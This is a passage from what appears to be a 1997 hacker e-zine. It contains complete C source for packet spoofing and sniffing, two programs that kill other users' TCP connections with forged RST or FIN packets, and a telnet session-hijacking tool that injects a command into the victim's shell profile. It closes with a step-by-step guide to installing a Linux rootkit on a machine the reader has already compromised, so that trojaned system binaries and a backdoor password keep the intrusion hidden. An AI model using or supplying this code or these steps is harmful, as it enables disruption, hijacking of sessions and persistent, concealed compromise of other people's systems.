sp_struct.buffer = sp_buffer;
sp_struct.IP_optlen = sp_ipoptlen;
sp_struct.TCP_optlen = sp_tcpoptlen;
sp_fix_TCP_packet(&sp_struct);
sp_fix_IP_packet(&sp_struct, 6);
sp_send_packet(&sp_struct, 6);
}
void sp_fix_UDP_packet (struct sp_data_exchange *sp)
{
char sp_pseudo_ip_construct[MTU];
struct UDP_header *sp_help_udp;
struct pseudo_IP_header *sp_help_pseudo;
int i;
for(i=0;i<MTU;i++)
{sp_pseudo_ip_construct[i]=0;}
sp_help_udp = (struct UDP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;
sp_help_udp->source = htons(sp->source_port);
sp_help_udp->destination = htons(sp->dest_port);
sp_help_udp->length = htons(sp->datalen+UDP_HEAD_BASE);
sp_help_pseudo->source = sp_getaddrbyname(sp->source);
sp_help_pseudo->destination = sp_getaddrbyname(sp->dest);
sp_help_pseudo->zero_byte = 0;
sp_help_pseudo->protocol = 17;
sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE);
memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE);
sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct,
sp->datalen+12+UDP_HEAD_BASE);
#ifdef DEBUG
printf("UDP header fixed...\n");
#endif
}
void transmit_UDP (int sp_fd, char *sp_data,
int sp_ipoptlen, int sp_datalen,
char *sp_source, unsigned short sp_source_port,
char *sp_dest, unsigned short sp_dest_port)
{
char sp_buffer[1500];
struct sp_data_exchange sp_struct;
bzero(sp_buffer,1500);
if (sp_ipoptlen!=0)
memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
if (sp_data!=NULL)
memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen,
sp_data+sp_ipoptlen,sp_datalen);
sp_struct.fd = sp_fd;
sp_struct.data = sp_data;
sp_struct.datalen = sp_datalen;
sp_struct.source = sp_source;
sp_struct.source_port = sp_source_port;
sp_struct.dest = sp_dest;
sp_struct.dest_port = sp_dest_port;
sp_struct.buffer = sp_buffer;
sp_struct.IP_optlen = sp_ipoptlen;
sp_struct.TCP_optlen = 0;
sp_fix_UDP_packet(&sp_struct);
sp_fix_IP_packet(&sp_struct, 17);
sp_send_packet(&sp_struct, 17);
}
/* This routine stolen from ping.c -- HAHAHA!*/
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
/************************* Receiving department ****************************/
int open_receiving (char *rc_device, char mode)
{
int or_fd;
struct sigaction rc_sa;
int fcntl_flag;
struct ifreq ifinfo;
char test;
/* create snoop socket and set interface promisc */
if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1)
perror("Couldn't open Socket."), exit(1);
strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device);
if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0)
perror("Couldn't get flags."), exit(1);
ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC;
if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0)
perror("Couldn't set flags. (PROMISC)"), exit(1);
if(mode&IO_HANDLE)
{ /* install handler */
rc_sa.sa_handler=rc_sigio; /* we don't use signal() */
sigemptyset(&rc_sa.sa_mask); /* because the timing window is */
rc_sa.sa_flags=0; /* too big... */
sigaction(SIGIO,&rc_sa,NULL);
}
if(fcntl(or_fd,F_SETOWN,getpid())<0)
perror("Couldn't set ownership"), exit(1);
if(mode&IO_HANDLE)
{
if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
perror("Couldn't get FLAGS"), exit(1);
if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0)
perror("Couldn't set FLAGS"), exit(1);
rc_fd_abc123=or_fd;
}
else
{
if(mode&IO_NONBLOCK)
{
if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
perror("Couldn't get FLAGS"), exit(1);
if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0)
perror("Couldn't set FLAGS"), exit(1);
};
};
#ifdef DEBUG
printf("Reading socket ready\n");
#endif
return or_fd;
}
/* returns 0 when no packet read! */
int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned char *proto)
{
char help_buffer[MTU];
int pack_len;
struct IP_header *gp_IPhead;
pack_len = read(rc_fd,help_buffer,1500);
if(pack_len<0)
{
if(errno==EWOULDBLOCK)
{pack_len=0;}
else
{perror("Read error:"); exit(1);}
};
if(pack_len>0)
{
pack_len -= DEV_PREFIX;
memcpy(buffer,help_buffer+DEV_PREFIX,pack_len);
gp_IPhead = (struct IP_header *) buffer;
if(proto != NULL)
*proto = gp_IPhead->protocol;
if(TCP_UDP_start != NULL)
*TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2;
}
return pack_len;
}
void wait_packet_timeout (int sig)
{
alarm(0);
WAIT_PACKET_WAIT_TIME=1;
}
int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,
char *wp_source, unsigned short wp_source_port,
char *wp_dest, unsigned short wp_dest_port, int wp_flags,
int wait_time)
{
char wp_buffer[1500];
struct IP_header *wp_iphead;
struct TCP_header *wp_tcphead;
unsigned long wp_sourcel, wp_destl;
int wp_tcpstart;
char wp_proto;
wp_sourcel=sp_getaddrbyname(wp_source);
wp_destl=sp_getaddrbyname(wp_dest);
WAIT_PACKET_WAIT_TIME=0;
if(wait_time!=0)
{
signal(SIGALRM,wait_packet_timeout);
alarm(wait_time);
}
while(1)
{
while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0)
{
if (WAIT_PACKET_WAIT_TIME!=0) {alarm(0); return -1;}
};
if(wp_proto == 6)
{
wp_iphead= (struct IP_header *) wp_buffer;
wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart);
if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) )
{
if( (ntohs(wp_tcphead->source)==wp_source_port) &&
(ntohs(wp_tcphead->destination)==wp_dest_port) )
{
if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) )
{
ret_values->seq=ntohl(wp_tcphead->seq_nr);
ret_values->ack=ntohl(wp_tcphead->ACK_nr);
ret_values->flags=ntohs(wp_tcphead->offset_flag)&
(URG|ACK|PSH|FIN|RST|SYN);
ret_values->datalen = ntohs(wp_iphead->length) -
((wp_iphead->verlen & 0xF) << 2) -
((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10);
alarm(0);
return 0;
}
}
}
}
}
/*impossible to get here.. but anyways*/
alarm(0); return -1;
}
void close_receiving (void)
{
close(rc_fd_abc123);
}
void rc_sigio (int sig) /* Packet handling routine */
{
char rc_buffer[1500];
char packet_id [50];
unsigned char *rc_so, *rc_dest;
struct IP_header *rc_IPhead;
struct TCP_header *rc_TCPhead;
int pack_len;
if(RC_FILTSET==0) return;
if(SP_DATA_BUSY!=0) /* skip this packet */
return;
pack_len = read(rc_fd_abc123,rc_buffer,1500);
rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX);
if(rc_IPhead->protocol!=6) return; /* if not TCP */
rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2));
rc_so = (unsigned char *) &(rc_IPhead->source);
rc_dest = (unsigned char *) &(rc_IPhead->destination);
sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source),
rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination));
if(strcmp(packet_id,rc_filter_string)==0)
{
SP_DATA_BUSY=1;
CUR_SEQ = ntohl(rc_TCPhead->seq_nr);
CUR_ACK = ntohl(rc_TCPhead->ACK_nr);
CUR_FLAGS = ntohs(rc_TCPhead->offset_flag);
CUR_DATALEN = ntohs(rc_IPhead->length) -
((rc_IPhead->verlen & 0xF) << 2) -
((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10);
CUR_COUNT++;
SP_DATA_BUSY=0;
}
}
void set_filter (char *f_source, unsigned short f_source_port,
char *f_dest, unsigned short f_dest_port)
{
unsigned char *f_so, *f_des;
unsigned long f_sol, f_destl;
RC_FILTSET=0;
if(DEV_PREFIX==9999)
fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1);
f_sol = sp_getaddrbyname(f_source);
f_destl = sp_getaddrbyname(f_dest);
f_so = (unsigned char *) &f_sol;
f_des = (unsigned char *) &f_destl;
sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
f_so[0],f_so[1],f_so[2],f_so[3],f_source_port,
f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port);
RC_FILTSET=1;
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
---=[ sniper-rst.c ]=---------------------------------------------------------
/**************************************************************************/
/* Sniper-rst - Example program on connection killing with IP spoofing */
/* Using the RST flag. */
/* (illustration for 'A short overview of IP spoofing') */
/* */
/* Purpose - Killing any TCP connection on your subnet */
/* */
/* Author - Dr_Sp00f (Himself) */
/* Serious advice, comments, statements, greets, always welcome */
/* flames, moronic 3l33t >/dev/null */
/* */
/* Disclaimer - This program is for educational purposes only. I am in */
/* NO way responsible for what you do with this program, */
/* or any damage you or this program causes. */
/* */
/* For whom - People with a little knowledge of TCP/IP, C source code */
/* and general UNIX. Otherwise, please keep your hands of, */
/* and catch up on those things first. */
/* */
/* Limited to - Linux 1.3.X or higher. */
/* ETHERNET support ("eth0" device) */
/* If you network configuration differs it shouldn't be to */
/* hard to modify yourself. I got it working on PPP too, */
/* but I'm not including extra configuration possibilities */
/* because this would overload this first release that is */
/* only a demonstration of the mechanism. */
/* Anyway if you only have ONE network device (slip, */
/* ppp,... ) after a quick look at this code and spoofit.h */
/* it will only take you a few secs to fix it... */
/* People with a bit of C knowledge and well known with */
/* their OS shouldn't have to much trouble to port the code.*/
/* If you do, I would love to get the results. */
/* */
/* Compiling - gcc -o sniper-rst sniper-rst.c */
/* */
/* Usage - Usage described in the spoofing article that came with this. */
/* If you didn't get this, try to get the full release... */
/* */
/* See also - Sniffit (for getting the necessairy data on a connection) */
/**************************************************************************/
#include "spoofit.h"
/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"
#define INTERFACE_PREFIX 14
char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;
void main(int argc, char *argv[])
{
int i,stat,j;
int fd_send, fd_receive;
unsigned long sp_ack, sp_seq;
unsigned short flags;
struct sp_wait_packet pinfo;
if(argc != 5)
{
printf("usage: %s host1 port1 host2 port2\n",argv[0]);
exit(0);
}
/* preparing some work */
DEV_PREFIX = INTERFACE_PREFIX;
strcpy(SOURCE,argv[1]);
SOURCE_P=atoi(argv[2]);
strcpy(DEST,argv[3]);
DEST_P=atoi(argv[4]);
/* opening sending and receiving sockets */
fd_send = open_sending();
fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */
printf("Trying to terminate the connection\n");
for(i=1;i<=100;i++)
{
/* Waiting for a packet containing an ACK */
stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5);
if(stat==-1) {printf("Connection 5 secs idle or dead...\n");exit(1);}
sp_seq=pinfo.ack;
sp_ack=0;
j=0;
/* Sending our fake Packet */
/* for(j=0;j<10;j++) This would be better */
/* { */
transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
sp_seq+j,sp_ack,RST);
/* } */
/* waiting for confirmation */
stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5);
if(stat<0)
{
printf("Connection 5 secs idle or dead...\n");
exit(0);
}
}
printf("I did not succeed in killing it.\n");
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
---=[ sniper-fin.c ]=---------------------------------------------------------
/**************************************************************************/
/* Sniper-fin - Example program on connection killing with IP spoofing */
/* using the FIN flag. */
/* (illustration for 'A short overview of IP spoofing') */
/* */
/* Purpose - Killing any TCP connection on your subnet */
/* */
/* Author - Dr_Sp00f (Himself) */
/* Serious advice, comments, statements, greets, always welcome */
/* flames, moronic 3l33t >/dev/null */
/* */
/* Disclaimer - This program is for educational purposes only. I am in */
/* NO way responsible for what you do with this program, */
/* or any damage you or this program causes. */
/* */
/* For whom - People with a little knowledge of TCP/IP, C source code */
/* and general UNIX. Otherwise, please keep your hands of, */
/* and catch up on those things first. */
/* */
/* Limited to - Linux 1.3.X or higher. */
/* ETHERNET support ("eth0" device) */
/* If you network configuration differs it shouldn't be to */
/* hard to modify yourself. I got it working on PPP too, */
/* but I'm not including extra configuration possibilities */
/* because this would overload this first release that is */
/* only a demonstration of the mechanism. */
/* Anyway if you only have ONE network device (slip, */
/* ppp,... ) after a quick look at this code and spoofit.h */
/* it will only take you a few secs to fix it... */
/* People with a bit of C knowledge and well known with */
/* their OS shouldn't have to much trouble to port the code.*/
/* If you do, I would love to get the results. */
/* */
/* Compiling - gcc -o sniper-fin sniper-fin.c */
/* */
/* Usage - Usage described in the spoofing article that came with this. */
/* If you didn't get this, try to get the full release... */
/* */
/* See also - Sniffit (for getting the necessairy data on a connection) */
/**************************************************************************/
#include "spoofit.h"
/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"
#define INTERFACE_PREFIX 14
char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;
void main(int argc, char *argv[])
{
int i,stat;
int fd_send, fd_receive;
unsigned long sp_ack, sp_seq;
unsigned short flags;
struct sp_wait_packet pinfo;
if(argc != 5)
{
printf("usage: %s host1 port1 host2 port2\n",argv[0]);
exit(0);
}
/* preparing some work */
DEV_PREFIX = INTERFACE_PREFIX;
strcpy(SOURCE,argv[1]);
SOURCE_P=atoi(argv[2]);
strcpy(DEST,argv[3]);
DEST_P=atoi(argv[4]);
/* opening sending and receiving sockets */
fd_send = open_sending();
fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */
for(i=1;i<100;i++)
{
printf("Attack Sequence %d.\n",i);
/* Waiting for a packet containing an ACK */
stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);}
sp_seq=pinfo.ack;
sp_ack=pinfo.seq+pinfo.datalen;
/* Sending our fake Packet */
transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq,sp_ack,ACK|FIN);
/* waiting for confirmation */
stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
if(stat>=0)
{
printf("Killed the connection...\n");
exit(0);
}
printf("Hmmmm.... no response detected... (retry)\n");
}
printf("I did not succeed in killing it.\n");
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
---=[ hijack.c ]=-------------------------------------------------------------
/**************************************************************************/
/* Hijack - Example program on connection hijacking with IP spoofing */
/* (illustration for 'A short overview of IP spoofing') */
/* */
/* Purpose - taking control of a running telnet session, and executing */
/* our own command in that shell. */
/* */
/* Author - Dr_Sp00f (Himself) */
/* Serious advice, comments, statements, greets, always welcome */
/* flames, moronic 3l33t >/dev/null */
/* */
/* Disclaimer - This program is for educational purposes only. I am in */
/* NO way responsible for what you do with this program, */
/* or any damage you or this program causes. */
/* */
/* For whom - People with a little knowledge of TCP/IP, C source code */
/* and general UNIX. Otherwise, please keep your hands of, */
/* and catch up on those things first. */
/* */
/* Limited to - Linux 1.3.X or higher. */
/* ETHERNET support ("eth0" device) */
/* If you network configuration differs it shouldn't be to */
/* hard to modify yourself. I got it working on PPP too, */
/* but I'm not including extra configuration possibilities */
/* because this would overload this first release that is */
/* only a demonstration of the mechanism. */
/* Anyway if you only have ONE network device (slip, */
/* ppp,... ) after a quick look at this code and spoofit.h */
/* it will only take you a few secs to fix it... */
/* People with a bit of C knowledge and well known with */
/* their OS shouldn't have to much trouble to port the code.*/
/* If you do, I would love to get the results. */
/* */
/* Compiling - gcc -o hijack hijack.c */
/* */
/* Usage - Usage described in the spoofing article that came with this. */
/* If you didn't get this, try to get the full release... */
/* */
/* See also - Sniffit (for getting the necessairy data on a connection) */
/**************************************************************************/
#include "spoofit.h" /* My spoofing include.... read licence on this */
/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0" /* first ethernet device */
#define INTERFACE_PREFIX 14 /* 14 bytes is an ethernet header */
#define PERSONAL_TOUCH 666
int fd_receive, fd_send;
char CLIENT[100],SERVER[100];
int CLIENT_P;
void main(int argc, char *argv[])
{
int i,j,count;
struct sp_wait_packet attack_info;
unsigned long sp_seq ,sp_ack;
unsigned long old_seq ,old_ack;
unsigned long serv_seq ,serv_ack;
/* This data used to clean up the shell line */
char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a};
char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n";
if(argc!=4)
{
printf("Usage: %s client client_port server\n",argv[0]);
exit(1);
}
strcpy(CLIENT,argv[1]);
CLIENT_P=atoi(argv[2]);
strcpy(SERVER,argv[3]);
/* preparing all necessary sockets (sending + receiving) */
DEV_PREFIX = INTERFACE_PREFIX;
fd_send = open_sending();
fd_receive = open_receiving(INTERFACE, 0); /* normal BLOCKING mode */
printf("Starting Hijacking demo - Brecht Claerhout 1996\n");
printf("-----------------------------------------------\n");
for(j=0;j<50;j++)
{
printf("\nTakeover phase 1: Stealing connection.\n");
wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);
sp_seq=attack_info.seq+attack_info.datalen;
sp_ack=attack_info.ack;
printf(" Sending Spoofed clean-up data...\n");
transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23,
sp_seq,sp_ack,ACK|PSH);
/* NOTE: always beware you receive y'r OWN spoofed packs! */
/* so handle it if necessary */
count=0;
printf(" Waiting for spoof to be confirmed...\n");
while(count<5)
{
wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
if(attack_info.ack==sp_seq+sizeof(to_data))
count=PERSONAL_TOUCH;
else count++;
};
if(count!=PERSONAL_TOUCH)
{printf("Phase 1 unsuccesfully ended.\n");}
else {printf("Phase 1 ended.\n"); break;};
};
printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n");
count=serv_seq=old_ack=0;
while(count<10)
{
old_seq=serv_seq;
old_ack=serv_ack;
wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0);
if(attack_info.datalen==0)
{
serv_seq=attack_info.seq+attack_info.datalen;
serv_ack=attack_info.ack;
if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
count=PERSONAL_TOUCH;
else count++;
}
};
if(count!=PERSONAL_TOUCH)
{printf("Phase 2 unsuccesfully ended.\n"); exit(0);}
printf(" Server SEQ: %X (hex) ACK: %X (hex)\n",serv_seq,serv_ack);
printf("Phase 2 ended.\n");
printf("\nTakeover phase 3: Sending MY data.\n");
printf(" Sending evil data.\n");
transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P,
SERVER,23,serv_ack,serv_seq,ACK|PSH);
count=0;
printf(" Waiting for evil data to be confirmed...\n");
while(count<5)
{
wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
if(attack_info.ack==serv_ack+sizeof(evil_data))
count=PERSONAL_TOUCH;
else count++;
};
if(count!=PERSONAL_TOUCH)
{printf("Phase 3 unsuccesfully ended.\n"); exit(0);}
printf("Phase 3 ended.\n");
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Using LinuxRootKitIII : suid
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Rooting machines is just half the fun, the whole point to owning something
is being able to keep root for as long as possible. To do this many kind
people have released what are known as root kits. There are currently root
kits available for a plethora of operating systems, e.g. Linux, SunOS, and
FreeBSD.
What a root kit does is installs many backdoored and trojanised programs
to replace the existing programs which are used to perform the basic tasks
of the host you owned. These tasks include: logging in, listing files,
listing proccesses and so on.
Focussing on a linux system, mainly because these are the most generally
rooted by the masses. There are a few versions of the rootkit around. The
main two you should have are LinuxRootKitIII, and LinuxRootKitII. You
should have both 2, and 3 because they are for different kinds of linux
machine. Generally, LinuxRootKitII (a.k.a lrk2) is for older Linux kernels
(in the 1.x range) and LinuxRootKitIII (a.k.a lrk3) is for the newer Linux
2.x kernels.
It should be noted somewhere in this article that you need to have owned
(rooted) the machine _before_ you try and install rootkit, installing it
as a non-root user wont work, and wont help you root the machine at all.
Also it should be noted that you shouldn't 'test' lrk2/lrk3 on your own
machine as it will probably just fuck you up.
Ok, now comes the part I like. To use lrk2 or 3, you need a few things, a
Linux box of the correct kernel version, root on that machine, and that
machine needs to be able to compile. Once you have that its not a big
problem. I'll take you thru it step by step.
1. Upload the lrk of the correct type. Remembering that its lrk2 for 1.x
kernels and lrk3 for 2.x kernels. To find out what kernel the remote
host is, type "uname -a" at the prompt, the number with the 2 radix
points is the kernel version.
Example:
[root@sploitable root] # uname -a
Linux sewid.org 2.0.29 #1 Sat Mar 22 17:39:12 EST 1997 i586
Ex1. This is a linux 2.0.29 kernel machine.
Uploading the proper root kit can be easily done by ftp'ing to your
remote machine and uploading it that way into some directory on a
device with sufficient room to store lrk uncompressed. (Lrk3 is over
3mb uncompressed). To check how much space each device has, type df.
2. Untar/gzip it. This can easily be done by chdir'ing to wherever you
uploaded it last step then executing the following command.
[root@sploitable root] # tar -zxvf LRKIII.tar.gz
3. Make it. Linux root kits are quite user friendly provided the
installation goes according to plan. To make the root kit, chdir to
wherever it was untared to (e.g in lrk3, you would type "cd lrk3"
from the directory you untarred it from.) and back up your existing
binaries. To do this its best to know where they are.
Here's a list of the binaries existing location on a common linux
system. You should copy all these as shown.
/bin/login
/usr/bin/passwd
/bin/ps
/bin/ls
/bin/netstat
/usr/bin/du
/usr/bin/top
/usr/bin/rsh
/sbin/ifconfig
/usr/bin/chsh
/usr/bin/chfn
/usr/sbin/inetd
If one of these files isnt on your system, or not in the directory
mentioned above, try to find it using the 'whereis' command.
Example: [root@sploitable lrk3] # whereis inetd
inetd: /etc/inetd.conf /usr/lbin/inetd /usr/man/man8/inetd.8
Bingo you found inetd hiding in /usr/lbin
I suggest copying all these to a directory called bin_bak or something
under your lrk dir. Something like "cp /bin/ls ./bin_bak" for all of
them is a good start.
Ok now you've taken precautions, modify the rootkit.h file that is in
the lrk directory. The minimum you should change is the default rootkit
password:
Example:
#define ROOTKIT_PASSWORD "lrkr0x"
Change this to...
#define ROOTKIT_PASSWORD "code-0"
Or anything you want that is *6 CHARACTERS LONG*.
Ok thats it. Now your read to compile, this part is taken care of by
the make file. All you need to do is type:
"make all install"
The make file takes all the source, compiles it, and places the new
backdoored binaries into all the right places for you.
It should be noted that once backdoored you should _NEVER_ attempt to
change your rootkit password with the 'passwd' command. The root
password is NOT THE SAME AS YOUR ROOTKIT PASSWORD. You may be able to
log into the system by typing "root" at the login prompt then some
password at the the password prompt, but this is a BACKDOOR, it does
not mean the root password is the same as the one you put in rootkit.h.
Happy Ownership.
suid 1997.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Well, that was issue 1, hope ya'll liked it, don't forget to visit...
http://micros0ft.paranoia.com
http://www.crackhouse.com
http://www.mastaz.org/codezero/
http://ulticonn.dyndns.com/codezero/
And that ends everything, sorry if we spent a little to long straightening some
shit out with sIn, but you deserve to know the truth...
Until next time, when there will be 950 days until the year 2000...
The CodeZero.
===============================================================================
==================> http://el8.netgates.co.uk coming s00n <==================
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Remember, Mcdonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
